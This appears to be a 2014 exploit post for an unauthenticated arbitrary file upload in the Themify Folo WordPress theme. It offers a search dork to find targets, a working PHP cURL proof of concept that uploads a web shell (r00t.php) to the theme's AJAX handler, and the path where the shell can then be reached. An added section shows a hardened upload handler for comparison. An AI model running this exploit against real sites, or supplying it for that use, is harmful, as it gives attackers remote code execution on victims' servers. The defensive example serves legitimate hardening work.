Friday, 5 September 2014

WordPress Folo Shell Upload

Exploit Title : WordPress Folo Theme (Themify) Arbitrary File Upload Vulnerability

#Vendor : http://themify.me/
#Download : http://themify.me/themes/folo
#Type : php, html, htm, asp, etc. (the uploader does not restrict file extensions)
#Category : Web Application
#Vulnerability : File Upload
#Tested On : Windows 7 64-bit (Mozilla Firefox)

#Dork : inurl:/wp-content/themes/folo/ (you can refine the dork yourself)

#POC :

<?php
// Target: the theme's bundled Themify AJAX handler, called with ?upload=1 and a
// multipart field named "Filedata". The handler requires no login and no nonce,
// and does not check the extension of the uploaded file.
// "korban" (Indonesian for "victim") and [PATH] are placeholders for the target
// host and the WordPress install path.
$uploadfile = "r00t.php";
$ch = curl_init("http://korban/[PATH]/wp-content/themes/folo/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true);
// CURLFile replaces the old "@filename" syntax, which PHP 5.6 disables by
// default and PHP 7 removed.
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata' => new CURLFile($uploadfile)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print $postResult;
?>

#Results : the uploaded file is written, under its original name, to a web-accessible directory inside the theme, so the shell is reachable at http://korban/[PATH]/wp-content/themes/folo/themify/uploads/{YOUR_FILE}.php (the original post gives the path as /wp-content/themes/folo/uploads/{YOUR_FILE}.php; check both).
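For contrast, here is an added example of how a WordPress AJAX upload handler closes the three gaps the PoC above relies on: no authentication, no nonce, and no file-type allowlist. This is illustrative code written for this page, not Themify's handler and not the vendor's fix; the hook name `folo_secure_upload`, the nonce action `folo_upload_nonce` and the request field `security` are assumptions. It keeps the `Filedata` field name from the PoC so the difference is easy to compare.

```php
<?php
// Added example: hardened WordPress AJAX upload handler.
// Hook name, nonce action and "security" field are assumptions for illustration.

// Register ONLY the authenticated hook. There is deliberately no
// wp_ajax_nopriv_* registration, so anonymous POSTs never reach the function.
add_action('wp_ajax_folo_secure_upload', 'folo_secure_upload');

function folo_secure_upload() {
    // 1. Nonce: the request must come from a page we rendered for this user.
    //    Dies with a 403 if the nonce is missing or invalid.
    check_ajax_referer('folo_upload_nonce', 'security');

    // 2. Capability: being logged in is not enough; the user must be allowed
    //    to upload media.
    if (!current_user_can('upload_files')) {
        wp_send_json_error('forbidden', 403);
    }

    if (empty($_FILES['Filedata']) || $_FILES['Filedata']['error'] !== UPLOAD_ERR_OK) {
        wp_send_json_error('no file uploaded', 400);
    }
    $file = $_FILES['Filedata'];

    // 3. Allowlist: the extension AND the sniffed content type must both match
    //    an allowed image type. r00t.php, r00t.php.jpg or a PHP payload renamed
    //    to .png all fail here.
    $allowed = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
    );
    $check = wp_check_filetype_and_ext($file['tmp_name'], $file['name'], $allowed);
    if (empty($check['ext']) || empty($check['type'])) {
        wp_send_json_error('file type not allowed', 415);
    }

    // 4. Let core place the file in wp-content/uploads with a sanitised,
    //    collision-free name, instead of move_uploaded_file() into a theme
    //    directory under the original filename.
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $result = wp_handle_upload($file, array('test_form' => false, 'mimes' => $allowed));
    if (isset($result['error'])) {
        wp_send_json_error($result['error'], 500);
    }

    wp_send_json_success(array('url' => $result['url']));
}
```

Even with these checks, the uploads directory should be configured at the web server so PHP is never executed from it; that way a bypass of the allowlist yields a downloadable file rather than a shell.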
